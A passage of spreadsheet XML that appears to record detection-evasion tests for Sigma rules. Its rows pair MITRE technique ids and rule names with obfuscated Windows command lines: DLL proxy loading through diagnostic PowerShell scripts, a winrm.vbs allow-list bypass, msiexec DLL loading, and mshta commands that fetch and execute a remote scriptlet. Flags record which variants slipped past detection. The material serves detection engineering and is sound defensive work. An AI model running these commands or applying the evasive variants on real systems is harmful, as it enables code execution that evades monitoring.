          <t>0403d67d-6227-4ea8-8145-4e72db7da120</t>
        </is>
      </c>
      <c r="E4023" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command ". C:\Windows\diagnostics\system\WindowsUpdate\Utility`Functions.ps1; RegSnapin -DllPath C:\test\myproxy.dll"</t>
        </is>
      </c>
      <c r="F4023" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4023" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4023" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4023" s="44" t="inlineStr">
        <is>
          <t>UtilityFunctions.ps1 Proxy Dll (0403d67d-6227-4ea8-8145-4e72db7da120); UtilityFunctions.ps1 Proxy Dll (0403d67d-6227-4ea8-8145-4e72db7da120); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J4023" s="44" t="n"/>
      <c r="K4023" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4024" ht="15.75" customHeight="1" s="42">
      <c r="A4024" s="44" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B4024" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_utilityfunctions</t>
        </is>
      </c>
      <c r="C4024" s="44" t="inlineStr">
        <is>
          <t>UtilityFunctions.ps1 Proxy Dll</t>
        </is>
      </c>
      <c r="D4024" s="44" t="inlineStr">
        <is>
          <t>0403d67d-6227-4ea8-8145-4e72db7da120</t>
        </is>
      </c>
      <c r="E4024" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -File C:\Windows\diagnostics\system\WindowsUpdate\utilityfunctions.ps1 -Command "RegSnapin	-DllPath C:\test\myproxy.dll"</t>
        </is>
      </c>
      <c r="F4024" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4024" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4024" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4024" s="44" t="inlineStr">
        <is>
          <t>UtilityFunctions.ps1 Proxy Dll (0403d67d-6227-4ea8-8145-4e72db7da120); UtilityFunctions.ps1 Proxy Dll (0403d67d-6227-4ea8-8145-4e72db7da120)</t>
        </is>
      </c>
      <c r="J4024" s="44" t="n"/>
      <c r="K4024" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4025" ht="15.75" customHeight="1" s="42">
      <c r="A4025" s="44" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B4025" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_utilityfunctions</t>
        </is>
      </c>
      <c r="C4025" s="44" t="inlineStr">
        <is>
          <t>UtilityFunctions.ps1 Proxy Dll</t>
        </is>
      </c>
      <c r="D4025" s="44" t="inlineStr">
        <is>
          <t>0403d67d-6227-4ea8-8145-4e72db7da120</t>
        </is>
      </c>
      <c r="E4025" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -inline ". (Join-Path 'C:\Windows\diagnostics\system\WindowsUpdate' 'UtilityFunctions.ps1'); &amp;('RegSnapin') -DllPath C:\test\myproxy.dll"</t>
        </is>
      </c>
      <c r="F4025" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4025" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4025" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4025" s="44" t="inlineStr">
        <is>
          <t>UtilityFunctions.ps1 Proxy Dll (0403d67d-6227-4ea8-8145-4e72db7da120); UtilityFunctions.ps1 Proxy Dll (0403d67d-6227-4ea8-8145-4e72db7da120)</t>
        </is>
      </c>
      <c r="J4025" s="44" t="n"/>
      <c r="K4025" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4026" ht="15.75" customHeight="1" s="42">
      <c r="A4026" s="44" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B4026" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cl_invocation</t>
        </is>
      </c>
      <c r="C4026" s="44" t="inlineStr">
        <is>
          <t>Potential Process Execution Proxy Via CL_Invocation.ps1</t>
        </is>
      </c>
      <c r="D4026" s="44" t="inlineStr">
        <is>
          <t>a0459f02-ac51-4c09-b511-b8c9203fc429</t>
        </is>
      </c>
      <c r="E4026" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command " . C:\\Windows\\Diagnostics\\system\\Audio\\CL_Invocation.ps1 ; SyncInvoke whoami.exe"</t>
        </is>
      </c>
      <c r="F4026" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4026" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4026" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4026" s="44" t="inlineStr">
        <is>
          <t>Potential Process Execution Proxy Via CL_Invocation.ps1 (a0459f02-ac51-4c09-b511-b8c9203fc429); Potential Process Execution Proxy Via CL_Invocation.ps1 (a0459f02-ac51-4c09-b511-b8c9203fc429)</t>
        </is>
      </c>
      <c r="J4026" s="44" t="n"/>
      <c r="K4026" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4027" ht="15.75" customHeight="1" s="42">
      <c r="A4027" s="44" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B4027" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cl_invocation</t>
        </is>
      </c>
      <c r="C4027" s="44" t="inlineStr">
        <is>
          <t>Potential Process Execution Proxy Via CL_Invocation.ps1</t>
        </is>
      </c>
      <c r="D4027" s="44" t="inlineStr">
        <is>
          <t>a0459f02-ac51-4c09-b511-b8c9203fc429</t>
        </is>
      </c>
      <c r="E4027" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command '. C:/Windows/Diagnostics/system/Audio/CL_Invocation.ps1; SyncInvoke whoami.exe'</t>
        </is>
      </c>
      <c r="F4027" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4027" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4027" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4027" s="44" t="inlineStr">
        <is>
          <t>Potential Process Execution Proxy Via CL_Invocation.ps1 (a0459f02-ac51-4c09-b511-b8c9203fc429); Potential Process Execution Proxy Via CL_Invocation.ps1 (a0459f02-ac51-4c09-b511-b8c9203fc429)</t>
        </is>
      </c>
      <c r="J4027" s="44" t="n"/>
      <c r="K4027" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4028" ht="15.75" customHeight="1" s="42">
      <c r="A4028" s="44" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B4028" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cl_invocation</t>
        </is>
      </c>
      <c r="C4028" s="44" t="inlineStr">
        <is>
          <t>Potential Process Execution Proxy Via CL_Invocation.ps1</t>
        </is>
      </c>
      <c r="D4028" s="44" t="inlineStr">
        <is>
          <t>a0459f02-ac51-4c09-b511-b8c9203fc429</t>
        </is>
      </c>
      <c r="E4028" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command '. CL_Invocation.ps1; SyncInvoke whoami.exe' -WorkingDirectory 'C:\Windows\Diagnostics\system\Audio'</t>
        </is>
      </c>
      <c r="F4028" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4028" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4028" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4028" s="44" t="inlineStr">
        <is>
          <t>Potential Process Execution Proxy Via CL_Invocation.ps1 (a0459f02-ac51-4c09-b511-b8c9203fc429); Potential Process Execution Proxy Via CL_Invocation.ps1 (a0459f02-ac51-4c09-b511-b8c9203fc429)</t>
        </is>
      </c>
      <c r="J4028" s="44" t="n"/>
      <c r="K4028" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4029" ht="15.75" customHeight="1" s="42">
      <c r="A4029" s="44" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B4029" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cl_invocation</t>
        </is>
      </c>
      <c r="C4029" s="44" t="inlineStr">
        <is>
          <t>Potential Process Execution Proxy Via CL_Invocation.ps1</t>
        </is>
      </c>
      <c r="D4029" s="44" t="inlineStr">
        <is>
          <t>a0459f02-ac51-4c09-b511-b8c9203fc429</t>
        </is>
      </c>
      <c r="E4029" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { . C:\Windows\Diagnostics\system\Audio\CL_Invocation.ps1; SyncInvoke whoami.exe }"</t>
        </is>
      </c>
      <c r="F4029" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4029" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4029" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4029" s="44" t="inlineStr">
        <is>
          <t>Potential Process Execution Proxy Via CL_Invocation.ps1 (a0459f02-ac51-4c09-b511-b8c9203fc429); Potential Process Execution Proxy Via CL_Invocation.ps1 (a0459f02-ac51-4c09-b511-b8c9203fc429)</t>
        </is>
      </c>
      <c r="J4029" s="44" t="n"/>
      <c r="K4029" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4030" ht="15.75" customHeight="1" s="42">
      <c r="A4030" s="44" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B4030" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winrm_awl_bypass</t>
        </is>
      </c>
      <c r="C4030" s="44" t="inlineStr">
        <is>
          <t>AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl</t>
        </is>
      </c>
      <c r="D4030" s="44" t="inlineStr">
        <is>
          <t>074e0ded-6ced-4ebd-8b4d-53f55908119d</t>
        </is>
      </c>
      <c r="E4030" s="44" t="inlineStr">
        <is>
          <t>C:\Temp\cscript.exe C:\Temp\winrm.vbs quickconfig /format:pretty</t>
        </is>
      </c>
      <c r="F4030" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4030" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4030" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4030" s="44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4030" s="44" t="n"/>
      <c r="K4030" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4031" ht="15.75" customHeight="1" s="42">
      <c r="A4031" s="44" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B4031" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winrm_awl_bypass</t>
        </is>
      </c>
      <c r="C4031" s="44" t="inlineStr">
        <is>
          <t>AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl</t>
        </is>
      </c>
      <c r="D4031" s="44" t="inlineStr">
        <is>
          <t>074e0ded-6ced-4ebd-8b4d-53f55908119d</t>
        </is>
      </c>
      <c r="E4031" s="44" t="inlineStr">
        <is>
          <t>C:\Temp\cscript.exe C:\Temp\winrm.vbs quickconfig "-format:pretty"</t>
        </is>
      </c>
      <c r="F4031" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4031" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4031" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4031" s="44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4031" s="44" t="n"/>
      <c r="K4031" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4032" ht="15.75" customHeight="1" s="42">
      <c r="A4032" s="44" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B4032" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winrm_awl_bypass</t>
        </is>
      </c>
      <c r="C4032" s="44" t="inlineStr">
        <is>
          <t>AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl</t>
        </is>
      </c>
      <c r="D4032" s="44" t="inlineStr">
        <is>
          <t>074e0ded-6ced-4ebd-8b4d-53f55908119d</t>
        </is>
      </c>
      <c r="E4032" s="44" t="inlineStr">
        <is>
          <t>C:\Temp\cscript.exe C:\Temp\winrm.vbs quickconfig -format:""pretty</t>
        </is>
      </c>
      <c r="F4032" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4032" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4032" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4032" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript (cea72823-df4d-4567-950c-0b579eaf0846)</t>
        </is>
      </c>
      <c r="J4032" s="44" t="n"/>
      <c r="K4032" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4033" ht="15.75" customHeight="1" s="42">
      <c r="A4033" s="44" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B4033" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winrm_awl_bypass</t>
        </is>
      </c>
      <c r="C4033" s="44" t="inlineStr">
        <is>
          <t>AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl</t>
        </is>
      </c>
      <c r="D4033" s="44" t="inlineStr">
        <is>
          <t>074e0ded-6ced-4ebd-8b4d-53f55908119d</t>
        </is>
      </c>
      <c r="E4033" s="44" t="inlineStr">
        <is>
          <t>C:\Temp\cscript.exe C:\Temp\winrm.vbs quickconfig "-format":"pretty"</t>
        </is>
      </c>
      <c r="F4033" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4033" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4033" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4033" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript (cea72823-df4d-4567-950c-0b579eaf0846)</t>
        </is>
      </c>
      <c r="J4033" s="44" t="n"/>
      <c r="K4033" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4034" ht="15.75" customHeight="1" s="42">
      <c r="A4034" s="44" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B4034" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winrm_awl_bypass</t>
        </is>
      </c>
      <c r="C4034" s="44" t="inlineStr">
        <is>
          <t>AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl</t>
        </is>
      </c>
      <c r="D4034" s="44" t="inlineStr">
        <is>
          <t>074e0ded-6ced-4ebd-8b4d-53f55908119d</t>
        </is>
      </c>
      <c r="E4034" s="44" t="inlineStr">
        <is>
          <t>C:\Temp\cscript.exe C:\Temp\winrm.vbs quickconfig -format:PRETTY</t>
        </is>
      </c>
      <c r="F4034" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4034" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4034" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4034" s="44" t="inlineStr">
        <is>
          <t>AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl (074e0ded-6ced-4ebd-8b4d-53f55908119d); Potential Dropper Script Execution Via WScript/CScript (cea72823-df4d-4567-950c-0b579eaf0846)</t>
        </is>
      </c>
      <c r="J4034" s="44" t="n"/>
      <c r="K4034" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4035" ht="15.75" customHeight="1" s="42">
      <c r="A4035" s="44" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B4035" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_http</t>
        </is>
      </c>
      <c r="C4035" s="44" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D4035" s="44" t="inlineStr">
        <is>
          <t>b98d0db6-511d-45de-ad02-e82a98729620</t>
        </is>
      </c>
      <c r="E4035" s="44" t="inlineStr">
        <is>
          <t>mshta.exe javascript:a=(GetObject('script:HttPs://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();</t>
        </is>
      </c>
      <c r="F4035" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4035" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4035" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4035" s="44" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE (b98d0db6-511d-45de-ad02-e82a98729620); Suspicious JavaScript Execution Via Mshta.EXE (67f113fa-e23d-4271-befa-30113b3e08b1)</t>
        </is>
      </c>
      <c r="J4035" s="44" t="n"/>
      <c r="K4035" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4036" ht="15.75" customHeight="1" s="42">
      <c r="A4036" s="44" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B4036" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_http</t>
        </is>
      </c>
      <c r="C4036" s="44" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D4036" s="44" t="inlineStr">
        <is>
          <t>b98d0db6-511d-45de-ad02-e82a98729620</t>
        </is>
      </c>
      <c r="E4036" s="44" t="inlineStr">
        <is>
          <t>mshta.exe javascript:a=(GetObject('script:https:\\raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();</t>
        </is>
      </c>
      <c r="F4036" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4036" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4036" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4036" s="44" t="inlineStr">
        <is>
          <t>Suspicious JavaScript Execution Via Mshta.EXE (67f113fa-e23d-4271-befa-30113b3e08b1)</t>
        </is>
      </c>
      <c r="J4036" s="44" t="n"/>
      <c r="K4036" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4037" ht="15.75" customHeight="1" s="42">
      <c r="A4037" s="44" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B4037" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_http</t>
        </is>
      </c>
      <c r="C4037" s="44" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D4037" s="44" t="inlineStr">
        <is>
          <t>b98d0db6-511d-45de-ad02-e82a98729620</t>
        </is>
      </c>
      <c r="E4037" s="44" t="inlineStr">
        <is>
          <t>mshta.exe "javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();"</t>
        </is>
      </c>
      <c r="F4037" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4037" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4037" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4037" s="44" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE (b98d0db6-511d-45de-ad02-e82a98729620); Suspicious JavaScript Execution Via Mshta.EXE (67f113fa-e23d-4271-befa-30113b3e08b1)</t>
        </is>
      </c>
      <c r="J4037" s="44" t="n"/>
      <c r="K4037" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4038" ht="15.75" customHeight="1" s="42">
      <c r="A4038" s="44" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B4038" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_http</t>
        </is>
      </c>
      <c r="C4038" s="44" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D4038" s="44" t="inlineStr">
        <is>
          <t>b98d0db6-511d-45de-ad02-e82a98729620</t>
        </is>
      </c>
      <c r="E4038" s="44" t="inlineStr">
        <is>
          <t>mshta.exe javascript:a=(GetObject('script:ht' + 'tps://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();</t>
        </is>
      </c>
      <c r="F4038" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4038" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4038" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4038" s="44" t="inlineStr">
        <is>
          <t>Suspicious JavaScript Execution Via Mshta.EXE (67f113fa-e23d-4271-befa-30113b3e08b1)</t>
        </is>
      </c>
      <c r="J4038" s="44" t="n"/>
      <c r="K4038" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4039" ht="15.75" customHeight="1" s="42">
      <c r="A4039" s="44" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B4039" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_http</t>
        </is>
      </c>
      <c r="C4039" s="44" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D4039" s="44" t="inlineStr">
        <is>
          <t>b98d0db6-511d-45de-ad02-e82a98729620</t>
        </is>
      </c>
      <c r="E4039" s="44" t="inlineStr">
        <is>
          <t>mshta.exe javascript:a=(GetObject('script:	https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();</t>
        </is>
      </c>
      <c r="F4039" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4039" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4039" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4039" s="44" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE (b98d0db6-511d-45de-ad02-e82a98729620); Suspicious JavaScript Execution Via Mshta.EXE (67f113fa-e23d-4271-befa-30113b3e08b1)</t>
        </is>
      </c>
      <c r="J4039" s="44" t="n"/>
      <c r="K4039" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4040" ht="15.75" customHeight="1" s="42">
      <c r="A4040" s="44" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B4040" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_javascript</t>
        </is>
      </c>
      <c r="C4040" s="44" t="inlineStr">
        <is>
          <t>Suspicious JavaScript Execution Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D4040" s="44" t="inlineStr">
        <is>
          <t>67f113fa-e23d-4271-befa-30113b3e08b1</t>
        </is>
      </c>
      <c r="E4040" s="44" t="inlineStr">
        <is>
          <t>mshta.exe JavaScipt:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();</t>
        </is>
      </c>
      <c r="F4040" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4040" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4040" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4040" s="44" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE (b98d0db6-511d-45de-ad02-e82a98729620)</t>
        </is>
      </c>
      <c r="J4040" s="44" t="n"/>
      <c r="K4040" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4041" ht="15.75" customHeight="1" s="42">
      <c r="A4041" s="44" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B4041" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_javascript</t>
        </is>
      </c>
      <c r="C4041" s="44" t="inlineStr">
        <is>
          <t>Suspicious JavaScript Execution Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D4041" s="44" t="inlineStr">
        <is>
          <t>67f113fa-e23d-4271-befa-30113b3e08b1</t>
        </is>
      </c>
      <c r="E4041" s="44" t="inlineStr">
        <is>
          <t>mshta.exe "javascript":a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();</t>
        </is>
      </c>
      <c r="F4041" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4041" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4041" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4041" s="44" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE (b98d0db6-511d-45de-ad02-e82a98729620); Suspicious JavaScript Execution Via Mshta.EXE (67f113fa-e23d-4271-befa-30113b3e08b1)</t>
        </is>
      </c>
      <c r="J4041" s="44" t="n"/>
      <c r="K4041" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4042" ht="15.75" customHeight="1" s="42">
      <c r="A4042" s="44" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B4042" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_javascript</t>
        </is>
      </c>
      <c r="C4042" s="44" t="inlineStr">
        <is>
          <t>Suspicious JavaScript Execution Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D4042" s="44" t="inlineStr">
        <is>
          <t>67f113fa-e23d-4271-befa-30113b3e08b1</t>
        </is>
      </c>
      <c r="E4042" s="44" t="inlineStr">
        <is>
          <t>mshta.exe 	javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();</t>
        </is>
      </c>
      <c r="F4042" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4042" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4042" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4042" s="44" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE (b98d0db6-511d-45de-ad02-e82a98729620); Suspicious JavaScript Execution Via Mshta.EXE (67f113fa-e23d-4271-befa-30113b3e08b1)</t>
        </is>
      </c>
      <c r="J4042" s="44" t="n"/>
      <c r="K4042" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4043" ht="15.75" customHeight="1" s="42">
      <c r="A4043" s="44" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B4043" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_javascript</t>
        </is>
      </c>
      <c r="C4043" s="44" t="inlineStr">
        <is>
          <t>Suspicious JavaScript Execution Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D4043" s="44" t="inlineStr">
        <is>
          <t>67f113fa-e23d-4271-befa-30113b3e08b1</t>
        </is>
      </c>
      <c r="E4043" s="44" t="inlineStr">
        <is>
          <t>mshta.exe vbscript:Execute("CreateObject(""WScript.Shell"").Run ""calc.exe"":window.close")</t>
        </is>
      </c>
      <c r="F4043" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4043" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4043" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4043" s="44" t="inlineStr">
        <is>
          <t>MSHTA Execution with Suspicious File Extensions (cc7abbd0-762b-41e3-8a26-57ad50d2eea3); Wscript Shell Run In CommandLine (2c28c248-7f50-417a-9186-a85b223010ee); Wscript Shell Run In CommandLine (2c28c248-7f50-417a-9186-a85b223010ee)</t>
        </is>
      </c>
      <c r="J4043" s="44" t="n"/>
      <c r="K4043" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4044" ht="15.75" customHeight="1" s="42">
      <c r="A4044" s="44" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B4044" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_dll</t>
        </is>
      </c>
      <c r="C4044" s="44" t="inlineStr">
        <is>
          <t>DllUnregisterServer Function Call Via Msiexec.EXE</t>
        </is>
      </c>
      <c r="D4044" s="44" t="inlineStr">
        <is>
          <t>84f52741-8834-4a8c-a413-2eb2269aa6c8</t>
        </is>
      </c>
      <c r="E4044" s="44" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe /z "C:\AtomicRedTeam\atomics\T1218.007\bin\MSIRunner.dll "</t>
        </is>
      </c>
      <c r="F4044" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4044" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4044" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4044" s="44" t="inlineStr">
        <is>
          <t>DllUnregisterServer Function Call Via Msiexec.EXE (84f52741-8834-4a8c-a413-2eb2269aa6c8)</t>
        </is>
      </c>
      <c r="J4044" s="44" t="n"/>
      <c r="K4044" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4045" ht="15.75" customHeight="1" s="42">
      <c r="A4045" s="44" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B4045" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_dll</t>
        </is>
      </c>
      <c r="C4045" s="44" t="inlineStr">
        <is>
          <t>DllUnregisterServer Function Call Via Msiexec.EXE</t>
        </is>
      </c>
      <c r="D4045" s="44" t="inlineStr">
        <is>
          <t>84f52741-8834-4a8c-a413-2eb2269aa6c8</t>
        </is>
      </c>
      <c r="E4045" s="44" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe /z C:\AtomicRedTeam\atomics\T1218.007\bin\MSIRunner.dll.lnk</t>
        </is>
      </c>
      <c r="F4045" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4045" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4045" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4045" s="44" t="inlineStr">
        <is>
          <t>DllUnregisterServer Function Call Via Msiexec.EXE (84f52741-8834-4a8c-a413-2eb2269aa6c8)</t>
        </is>
      </c>
      <c r="J4045" s="44" t="n"/>
